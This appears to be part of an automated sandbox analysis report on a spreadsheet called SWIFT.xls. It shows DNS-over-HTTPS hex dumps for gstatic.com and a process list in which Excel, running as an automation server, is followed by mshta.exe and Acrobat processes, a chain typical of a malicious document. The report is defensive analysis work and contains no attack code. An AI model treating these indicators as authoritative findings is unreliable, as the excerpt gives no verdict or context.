                                          2024-12-20 14:29:01 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: wwwgstaticcom)TP
                                          2024-12-20 14:29:01 UTC247INHTTP/1.1 200 OK
                                          Server: cloudflare
                                          Date: Fri, 20 Dec 2024 14:29:01 GMT
                                          Content-Type: application/dns-message
                                          Connection: close
                                          Access-Control-Allow-Origin: *
                                          Content-Length: 468
                                          CF-RAY: 8f50527cbb4642ca-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-12-20 14:29:01 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 12 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: wwwgstaticcom c)


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:09:27:30
                                          Start date:20/12/2024
                                          Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                          Imagebase:0x7ff7a90e0000
                                          File size:70'082'712 bytes
                                          MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:17
                                          Start time:09:28:26
                                          Start date:20/12/2024
                                          Path:C:\Windows\System32\mshta.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\mshta.exe -Embedding
                                          Imagebase:0x7ff62ba60000
                                          File size:32'768 bytes
                                          MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:20
                                          Start time:09:28:34
                                          Start date:20/12/2024
                                          Path:C:\Windows\splwow64.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\splwow64.exe 12288
                                          Imagebase:0x7ff6a9df0000
                                          File size:192'512 bytes
                                          MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:25
                                          Start time:09:28:45
                                          Start date:20/12/2024
                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding
                                          Imagebase:0x7ff652120000
                                          File size:5'887'384 bytes
                                          MD5 hash:4354BCD7483AABB81809350484FFD58F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:28
                                          Start time:09:28:48
                                          Start date:20/12/2024
                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                          Imagebase:0x7ff6da3e0000
                                          File size:3'661'208 bytes
                                          MD5 hash:B104218348848F1F113AF11C0982931A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:31
                                          Start time:09:28:53
                                          Start date:20/12/2024
                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/24.4.20272 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\UserData" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1656,i,13889243780433033577,2117766799754663764,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                          Imagebase:0x7ff6da3e0000
                                          File size:3'661'208 bytes
                                          MD5 hash:B104218348848F1F113AF11C0982931A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:32
                                          Start time:09:28:59
                                          Start date:20/12/2024
                                          Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SWIFT.xls"
                                          Imagebase:0x7ff7a90e0000
                                          File size:70'082'712 bytes
                                          MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Disassembly

                                          No disassembly